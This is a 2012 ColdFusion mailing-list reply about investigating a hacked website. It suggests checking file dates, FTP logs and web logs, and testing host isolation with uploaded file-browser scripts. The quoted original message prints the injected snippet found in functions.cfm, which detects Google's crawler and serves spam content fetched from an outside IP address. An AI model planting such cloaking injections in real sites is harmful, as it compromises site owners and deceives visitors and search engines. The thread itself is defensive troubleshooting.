firstly you should try to determine when the hack was done. check the last modified date of the file in question (unless you have already edited it since). Then ask your host to check the FTP logs for that date and see if anyone accessed that file on that date, this will rule out FTP as the cause. If it was FTP, then they can tell you the login details used and from what IP address. this will tell you if it was one of your developers or someone else.
Then you can check your web logs for that date and look for any injections that may have occurred which will show which file was the one used for the hack. To test your hosts server security, upload a file browser script in all the supported languages (php, asp, .net, cf, perl etc) and tried to read/write files outside your webspace. You should be able to download free scripts for this. On Tue, Nov 13, 2012 at 8:57 PM, Les Mizzell <[email protected]> wrote: > > Recently a site of ours got hacked - basically, a Google search the site > was returning viagra info! > What we got was a small script added to the end of a functions.cfm file: > > <cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( > "google", REQUEST.UserAgent )) > > <cfhttp method="get" > url="http://168.16.228.250/fms/ > "><cfoutput>#cfhttp.filecontent#</cfoutput></cfif> > > I'm not the server admin for this site, so they're sorta pointing the > finger at us developers, and we're pointing fingers back at them about > lax server security. We've got a boatload of stuff on this site to > prevernt SQL injection, including Justin D. Scott's application script, > carefully checking anything to goes into the database, client and server > side form validation, blah, blah, blah... > > Anybody seen the above, and if so, thoughts? Anybody manage to determine > how the exploit happened to start with? > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353151 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
